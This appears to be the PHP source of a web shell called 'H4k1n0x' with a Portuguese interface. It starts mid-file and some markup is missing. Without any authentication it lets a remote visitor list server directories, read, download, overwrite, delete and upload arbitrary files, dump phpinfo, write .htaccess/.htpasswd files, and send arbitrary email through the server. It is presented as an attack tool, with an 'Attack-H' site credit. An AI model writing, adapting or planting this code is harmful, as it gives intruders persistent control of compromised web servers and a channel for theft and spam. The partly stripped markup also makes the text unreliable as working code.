';
$t1 = '
';
$t2 = ' ';
$t3 = getenv("HTTP_HOST");
$s = $_GET["s"];
$cmd = $_GET["cmd"];
$Command = $_GET["Command"];
$Nome = $_GET["Nome"];
if ($cmd == 'input'){
$local = $_POST["local"];
header("Location: ".code("cmd=manager&dir=".$local."")."");
}
if ($cmd == 'phpinfo'){
if (print("H4k1n0x [ PHP INFO ] ") AND @phpinfo()){
exit;
} else {
echo "H4k1n0x [ PHP INFO ] ";
echo "";
exit;
} }
$dir = $_GET["dir"];
$software = getenv("SERVER_SOFTWARE");
if (@ini_get("safe_mode") OR strtolower(@ini_get("safe_mode")) == "on"){
$safemode = "ON (Seguro) ";
} else {
$safemode = "OFF (Não Seguro) ";
}
function code($link=''){
$cmds = array('cmd','Command','s','dir','ArquivoV');
$phpsl = $_SERVER['PHP_SELF'].'?';
$novo = explode('&',$link);
foreach($_GET as $Ch => $v){
$var = 1;
foreach($novo as $bar){
$exp = explode('=',$bar);
if($exp[0] == $Ch)$var=0;
}
if($var){if(!in_array($Ch,$cmds))$phpsl.="$Ch=$v&";}
}
$phpsl.=$link;
return $phpsl;
}
if ($cmd == 'baixar'){
$Arq = $_GET['Arquivo'];
@ob_clean();
$arquivoB = @file_get_contents($Arq);
header('Content-type: application/octet-stream');
header('Content-disposition: attachment; filename="'.$Nome.'";');
header('Content-length: '.strlen($arquivoB));
echo $arquivoB;
exit;
}
if ($cmd == 'excluir'){
if (@unlink($Command)){
} else {
echo "Arquivo não pode ser deletado";
} }
if ($cmd == 'ArquivoV'){
$Command = $_GET["Command"];
function VPgna($Command){
$ext = strtolower(substr($Command,strrpos($Command,'.')+1));
$src = array('php','php3','php4','phps','phtml','phtm','inc');
if(in_array($ext,$src))highlight_file($Command);
else echo ''.htmlspecialchars(@file_get_contents($Command)).' ';
} }
function permissao($is_file){
$perms = fileperms($is_file);
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
echo $info;
}
if ($dir == ''){
$input = getcwd();
$dir1 = dir(".");
$dir2 = dir(".");
$is_dir1 = ".";
$is_file1 = ".";
} else {
$input = $dir;
$dir1 = @dir($dir);
$dir2 = @dir($dir);
$is_dir1 = $dir;
$is_file1 = $dir;
}
echo ''.$t1.'H4k1n0x [ '.$t3.' ]'.$t2.'
'.$varBar.'
!H4k1n0x!
[ www.Attack-H.org ]
'.$varBar.'
Software: '.$software.'
Safe-mode: '.$safemode.'
Info: ';
$diretorioC = scandir($input);
$numeC = count($diretorioC) - 2;
echo ''.$numeC.'
Total
'.$varBar.'
[ Manager
] [ Passwd .ht* ]
[ Mail ] [ ';?>','phpinfo','width=800,height=600,scrollbars=yes,scroll=yes');void(0);"> ] [ Sobre ]
';
if ($cmd == 'manager'){
if ($Command == 'upload'){
$uploadL = $_POST["uploadL"];
$file = $_FILES["arquivo"];
if (move_uploaded_file($file["tmp_name"], "$uploadL/".$file["name"])) {
}else {
echo "Erro, o arquivo não pode ser enviado.";
} }
echo '
'.$varBar.'
Nome
Tamanho
Modificação
Permissão
Grupo
Ferramentas
';
while(@$dirs = $dir1->read()){
$is_dir = $is_dir1.'/'.$dirs;
if (is_dir($is_dir)){
echo '
[ D ]'.$dirs.'
Pasta
'.date("d/m/Y H:i:s",filemtime($is_dir)).' '; ?>
Abrir
';
} }
while($arquivos = $dir2->read()){
$is_file = $is_file1.'/'.$arquivos;
if (is_file($is_file)){
echo '
[ A ]'.$arquivos.'
'.filesize($is_file) . " bytes".'
'; print date("d/m/Y H:i:s",filemtime($is_file)); echo '
'; echo permissao($is_file); echo '
'; echo $_ENV["APACHE_RUN_GROUP"] . ' / ' . $_ENV["APACHE_RUN_USER"]; echo '
Editar | Baixar
| Excluir
';
} } echo '
';
} elseif ($cmd == 'ArquivoV'){ echo '
'.$varBar.'
';?>
';
} elseif ($cmd == 'editar'){
if ($s == 'salvar'){
$script = $_POST["script"];
$arquivo = @fopen($Command,'w');
@fwrite($arquivo,$script);
@fclose($arquivo);
} echo '
';
} elseif ($cmd == 'password'){
if ($Command == 'pdw'){
$uroot = $_POST["uroot"];
$upass = $_POST["upass"];
$umesa = $_POST["umesa"];
$udir = $_POST["udir"];
$acess = 'AuthName "'.$umesa.'"
AuthType Basic
AuthUserFile "'.$udir.'/.htpasswd"
Require valid-user
';
$hta = @fopen(''.$udir.'/.htaccess','w');
@fwrite($hta,$acess);
@fclose($hta);
$pwd = "".$uroot.":".$upass."";
$passwd = @fopen(''.$udir.'/.htpasswd','w');
@fwrite($passwd,$pwd);
@fclose($passwd);
echo "Proteção aplicada";
}
echo '
'.$varBar.'
Usuário:
id="uroot" value="" size="30">
Senha:
id="upass" value="" size="30">
Mensagem:
" size="30">
Diretório:
';
} elseif ($cmd == 'mail'){
if ($Command == 'enviar'){
$de = $_POST["de"];
$para = $_POST["para"];
$assunto = $_POST["assunto"];
$mensagem = $_POST["mensagem"];
global $de;
if (@mail("$para","$assunto","$mensagem","From: $de")){
echo "";
} else {
echo "";
} }
echo '
'.$varBar.'
De:
id="de" value="" size="50">
Para:
Assunto:
Mensagem:
';
} elseif ($cmd == 'sobre'){
echo '
'.$varBar.'
Nome:
Versão:
Autor:
País:
Site:
Email:
';
} else { echo '
'.$varBar.'
Manager -> Gerenciador de Arquivos [ Editar,
Baixar, Excluir ]
Passwd .ht* -> Adiciona senhas em diretórios
Mail -> Enviar Email usando SMTP do Servidor
PHP INFO -> Informações do PHP
Sobre -> Sobre H4k1n0x
Autor: Code RED
Site: www.Attack-H.org
';
} echo '
'.$varBar.'
'; ?>